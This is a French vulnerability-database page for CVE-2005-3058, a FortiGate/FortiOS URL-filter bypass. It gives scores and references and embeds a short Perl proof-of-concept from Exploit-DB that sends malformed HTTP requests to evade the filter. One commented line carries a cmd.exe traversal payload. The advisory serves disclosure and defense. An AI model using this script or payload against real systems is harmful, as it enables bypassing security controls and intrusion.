CVE-2005-3058 : Détail

CVE-2005-3058

A01-Broken Access Control
5.69%V4
Network
2006-02-14
18h00 +00:00
2018-10-19
12h57 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Interpretation conflict in Fortinet FortiGate 2.8, running FortiOS 2.8MR10 and v3beta, allows remote attackers to bypass the URL blocker via an (1) HTTP request terminated with a line feed (LF) and not carriage return line feed (CRLF) or (2) HTTP request with no Host field, which is still processed by most web servers without violating RFC2616.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-264 Category : Permissions, Privileges, and Access Controls
Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 27203

Date de publication : 2006-02-12 23h00 +00:00
Auteur : Mathieu Dessus
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/16599/info Fortinet FortiGate is prone to a vulnerability that could allow users to bypass the device's URL filtering. FortiGate devices running FortiOS v2.8MR10 and v3beta are vulnerable to this issue. Other versions may also be affected. # http_req.pl # # Made by (Mathieu Dessus) # # Make a filter for /test* URL in the Fortigate and # remove the # depending on which HTTP request you want to test use IO::Socket; $target = '1.2.3.4'; # Detected $data = "GET /test HTTP/1.1\r Host: $target\r Pragma: no-cache\r Accept: */*\r \r "; # Not detected $data = "GET /test2 HTTP/1.1 Host: $target Pragma: no-cache Accept: */* "; # Not detected $data = "GET /test3 HTTP/1.0\r\n\r\n"; # Detected #$data = "GET /test4 HTTP/1.0\r\nHost: $target\r\n\r\n"; # Detected :) #$data = "GET //c/winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n"; my $sock = new IO::Socket::INET ( PeerAddr => $target, PeerPort => '80', Proto => 'tcp', ); die "Could not create socket: $!\n" unless $sock; print $sock $data; read($sock, $ret, 600); print($ret."\n"); close($sock);

Products Mentioned

Configuraton 0

Fortinet>>Fortios >> Version To (including) 2.8_mr10

    Fortinet>>Fortios >> Version To (including) 3_beta

    Configuraton 0

    Fortinet>>Fortigate >> Version 2.8

      Références

      http://www.securityfocus.com/bid/16599
      Tags : vdb-entry, x_refsource_BID
      http://secunia.com/advisories/18844
      Tags : third-party-advisory, x_refsource_SECUNIA
      http://www.vupen.com/english/advisories/2006/0539
      Tags : vdb-entry, x_refsource_VUPEN